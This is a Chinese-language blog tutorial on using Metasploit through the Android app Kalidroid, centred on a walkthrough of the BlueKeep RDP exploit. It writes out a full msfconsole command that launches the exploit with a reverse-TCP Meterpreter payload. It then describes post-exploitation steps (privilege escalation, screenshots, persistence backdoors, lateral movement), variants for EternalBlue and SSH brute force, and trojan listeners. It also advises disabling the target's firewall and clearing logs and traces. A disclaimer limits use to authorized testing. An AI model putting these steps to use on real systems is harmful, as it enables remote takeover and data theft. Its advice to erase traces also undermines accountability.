Kalidroid Metasploit 完整实战教程|安卓手机图形化漏洞利用框架

Kalidroid Metasploit 完整实战教程|安卓手机图形化漏洞利用框架

前言

Metasploit(简称 MSF)是渗透测试行业标准漏洞利用框架,传统只能在电脑 Kali 运行,而Kalidroid将 MSF 完整移植到安卓手机,封装全图形可视化操作界面,无需记忆冗长命令,手机端即可完成漏洞加载、载荷配置、监听上线、漏洞攻击全流程。

 

本文基于真机  (华为p90,Kalidroid v1.3.29-debug)全套实操截图,以 BlueKeep(CVE-2019-0708 RDP 远程代码执行漏洞)为例手把手教学,所有操作仅允许在拥有完整书面授权的设备环境开展测试

一、什么是 Kalidroid?

Kalidroid 是一款面向安全研究人员、渗透测试人员及网络爱好者的 Android 应用,它能够在原生 Android 8+ 系统上以接近原生 CPU 速度运行完整、持久的 Kali Linux 环境。与传统方案不同,Kalidroid 无需 root 权限、无需软件 chroot、无需自行编译内核。它基于 Android 虚拟化框架(AVF)与 pKVM 硬件虚拟化构建,在主机 Android 与客户机虚拟机之间实施完整的内存隔离,实现接近原生的 CPU 性能

Kalidroid 内置或支持一键部署多种渗透测试工具,包括 NMAP、WPScan 以及本教程的主角——Metasploit Framework

一、Metasploit 环境准备

首次打开如图,点击安装即可,根据手机性能而定30-60分钟

20260719063414209-77cfe2b81603c90ea703bae559232877

一、Metasploit 模块入口与环境状态介绍

1. 模块打开方式

打开 Kalidroid 主界面,下滑功能列表,找到红框标注的 Metasploit 选项,点击进入框架配置页面。

20260719063244363-image

界面顶部会显示METASPLOIT 环境状态:

  • 状态为「活跃」:代表 MSF 组件、PostgreSQL 数据库已完整安装,可直接启动 msfconsole;
  • 若状态异常,点击「重新扫描」自动修复缺失依赖与数据库配置。

2. MODE 运行模式四大功能分区

页面内置 4 种 MSF 核心运行模式,适配不同渗透场景:
模式 功能用途 使用场景
msfconsole(默认选中) 交互式漏洞控制台,加载漏洞模块、配置目标、执行攻击 漏洞验证、内网渗透、漏洞利用(本次教程核心)
msfvenom 免杀木马、反弹 Shell 载荷生成器 制作安卓 / Windows/Linux 后门程序
Handler 独立监听程序,后台等待目标反弹连接 单独开启端口监听,配合外部生成的木马
msfrpcd MSF 远程 RPC 服务,API 调用框架 自动化脚本、第三方工具联动 MSF

本教程主要使用 msfconsole 入口进行漏洞利用操作。

三、模块预设与快速利用

Kalidroid 的 Metasploit 模块内置了多个常用漏洞利用预设,方便快速启动:

3. 模块预设(内置一键漏洞模板)

软件提前封装高频热门漏洞模块,无需手动输入漏洞路径,一键选中加载:
  1. EternalBlue(永恒之蓝 MS17-010):Windows SMBv1 高危远程溢出
  2. BlueKeep(CVE-2019-0708):Windows RDP 远程代码执行(本次实操案例)
  3. Log4Shell(CVE-2021-44228):Java Log4j 远程注入漏洞
  4. SSH login:SSH 服务弱口令爆破辅助模块
  5. SMB version:SMB 服务版本探测
  6. HTTP login:网站基础认证爆破
  7. Multi handler:多架构通用反弹监听
  8. Persistence:Windows 注册表持久化后门模块
本次实操选择 BlueKeep Windows·RDP RCE 漏洞模板。

20260719063822976-image

二、漏洞模块、载荷可视化配置详解

点击 BlueKeep 预设模板后,自动跳转漏洞参数配置页面,分为四大核心配置区:模块路径、有效载荷、目标与监听、自定义高级参数。

1. 模块路径(自动填充)

exploit/windows/rdp/cve_2019_0708_bluekeep
对应 MSF 原生漏洞路径,图形界面自动填充,无需手动输入,切换漏洞模板会自动变更路径。
2. 有效载荷(Payload)选择
载荷是漏洞利用成功后,获取目标主机控制权的交互程序,软件内置全平台载荷分类:

Windows 主机推荐(本次案例)

meterpreter (win x64) windows · staged
  • 优势:Windows 64 位系统专用,Meterpreter 全功能交互式 shell,支持文件上传下载、屏幕截图、权限提升、进程管理,分段传输稳定性强。
     

    其他可选 Windows 载荷:

  • meterpreter (win x86):32 位 Windows 系统专用
  • shell (win x64):基础 cmd 反弹 shell,功能简陋

Linux / 安卓平台载荷

  • meterpreter (linux x64/arm64):服务器、ARM 安卓设备交互 shell
  • meterpreter (android):APK 安卓木马载荷

Web 脚本载荷

python/php reverse_tcp:网站漏洞专用反弹脚本载荷
3. 目标与监听核心参数(攻击成功关键)

20260719064134118-image

① 目标配置区

  • RHOSTS:填写存在漏洞的目标设备 IP,例:192.168.10.4(Nmap 扫描发现的 Windows 主机)
  • RPORT:漏洞对应服务端口,BlueKeep 漏洞默认 RDP 端口 3389,可留空自动使用模块默认端口

② 监听器配置区(LHOST/LPORT)

  • LHOST:本机回连 IP,填写手机当前局域网 IP 192.168.10.6,目标漏洞触发后主动连接该地址
  • LPORT:监听端口,通用默认 4444,可自定义 5000、8080 等未占用端口
     

    提示说明:

     

    内网环境填写手机局域网 IP;外网公网测试需填写公网 IP,并在路由器做端口转发映射 LPORT 端口。

4. 自定义参数与全局启动设置

20260719064206356-image

自定义参数(高级稳定配置)

AutoRunScript=multi_console_command
ExitOnSession=false
参数作用:
  1. AutoRunScript:会话上线自动执行预设脚本,简化后续操作
  2. ExitOnSession=false:一条目标会话关闭后,监听不终止,持续等待新主机上线

底部全局设置开关

  1. 自动初始化 msfdb:开启后自动加载 MSF 数据库,可保存扫描主机、漏洞会话、凭证信息;关闭则无数据库功能
  2. 安静横幅(-q 参数):跳过 MSF 启动大段 ASCII 字符画,加快启动速度
  3. ANSI 颜色:开启终端彩色日志,区分漏洞报错、上线会话、成功提示

三、一键启动 msfconsole 执行漏洞攻击

所有参数配置完成后,页面底部蓝色按钮「打开 msfconsole」,点击自动执行拼接完整 MSF 启动命令:
kalidroid-msfdb; msfconsole -q -x 'workspace default; use exploit/windows/rdp/cve_2019_0708_bluekeep; set payload windows/x64/meterpreter/reverse_tcp; set RHOSTS 192.168.10.4; set LHOST 192.168.10.6; set LPORT 4444; set ExitOnSession false; exploit'

20260719064701152-image

程序自动完成全套操作:

  1. 初始化 MSF 数据库
  2. 安静模式启动控制台
  3. 切换默认工作区 default
  4. 自动加载 BlueKeep 漏洞模块
  5. 自动设置 win64 meterpreter 载荷
  6. 填充目标 IP、监听地址端口
  7. 后台开启持续监听
  8. 执行 exploit 发起漏洞攻击

攻击成功后操作

漏洞利用成功,目标主机主动回连手机监听端口,生成 Meterpreter 会话,可执行操作:
  1. 系统信息查询:sysinfo 查看系统版本、架构
  2. 权限提升:getsystem 获取 Windows 管理员最高权限
  3. 文件管理:upload/download 上传下载主机文件
  4. 屏幕截图:screenshot 抓取目标桌面
  5. 持久化后门:添加开机自启维持长期访问

四、完整渗透链路搭配使用流程(结合之前 Nmap 教程)

  1. Nmap 内网扫描:探测内网存活主机,识别开放 3389(RDP)、445(SMB)高危端口
  2. 资产筛选:找到开启 RDP 3389 的 Windows 主机,确认目标存在 BlueKeep 漏洞风险
  3. 打开 Kalidroid Metasploit 模块,选择对应漏洞模板 BlueKeep
  4. 配置 win x64 Meterpreter 载荷,填写目标 IP 与手机监听地址
  5. 一键启动 msfconsole 发起攻击,等待会话上线
  6. 利用 Meterpreter 收集目标数据、横向渗透内网其他设备

五、多场景模块使用方案

场景 1:永恒之蓝 SMB 漏洞攻击(MS17-010)

  1. 预设模板选择 EternalBlue
  2. 载荷同样选择 windows/x64/meterpreter/reverse_tcp
  3. RHOST 填写开放 445 端口的 Windows 主机 IP,RPORT 默认 445 无需修改
  4. LHOST/LPORT 填写手机局域网监听地址,启动攻击

场景 2:SSH 弱口令爆破

  1. 预设模板选择 SSH login
  2. 无需配置反弹载荷,仅设置 RHOST 目标 IP、账号密码字典
  3. 启动后自动暴力破解 SSH 登录凭证

场景 3:独立木马监听(Handler 模式)

  1. MODE 切换为 Handler,仅配置 LHOST、LPORT 与对应载荷
  2. 先用 msfvenom 生成 Windows / 安卓木马程序
  3. 将木马在目标设备执行,Handler 等待反弹会话上线

六、常见故障排错指南

问题现象 故障原因 解决办法
MSF 环境显示非活跃,无法启动 数据库损坏、依赖缺失 点击「重新扫描」自动修复组件;重启 Kalidroid
攻击无会话上线,漏洞利用失败 1. 目标无对应漏洞;2. 防火墙拦截 3389/4444 端口;3.LHOST 填写错误 重新 Nmap 确认端口;关闭目标防火墙;核对手机局域网 IP
启动 msfconsole 卡顿闪退 线程占用过高、手机内存不足 关闭后台其他 APP;关闭自动数据库初始化开关;拆分分段扫描攻击
载荷不兼容,攻击直接报错 系统架构匹配错误(32 位 / 64 位选错) Windows 10/11 主流选择 win x64 载荷,老旧 XP 选用 win x86
会话上线后立刻断开 ExitOnSession 参数开启,单条会话关闭即停止监听 自定义参数添加 ExitOnSession=false

七、法律合规重要警示

  1. 严禁对未取得书面授权的服务器、电脑、智能设备执行漏洞利用、渗透攻击,私自测试、入侵他人设备违反《网络安全法》,需承担民事、行政乃至刑事责任。
  2. 本教程仅用于企业内部安全自查、网络安全专业学习、授权环境漏洞修复演练。
  3. 测试完成后及时关闭监听端口、删除后门程序、清理 MSF 扫描日志,消除测试痕迹。

教程总结

  1. Kalidroid 内置图形化 Metasploit 框架,安卓手机脱离电脑完成全套漏洞利用,内置主流漏洞一键模板,无需手写复杂命令;
  2. 核心操作逻辑:选定漏洞模板 → 匹配对应系统载荷 → 填写目标 IP + 本机监听地址 → 一键启动攻击;
  3. 可与 Nmap、SubFinder 工具联动,形成「资产收集→漏洞探测→漏洞利用」完整移动端渗透测试链路;
  4. 内网测试重点保证 LHOST 为手机局域网 IP,端口无防火墙拦截,才能稳定获取反弹会话。

往期 & 下期预告

上期:Kalidroid Nmap 内网端口扫描实战 / SubFinder 子域名资产挖掘

 

下期:Kalidroid msfvenom 木马生成教程,Windows / 安卓反弹载荷制作详解

© 版权声明
THE END
喜欢就支持一下吧
点赞14赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容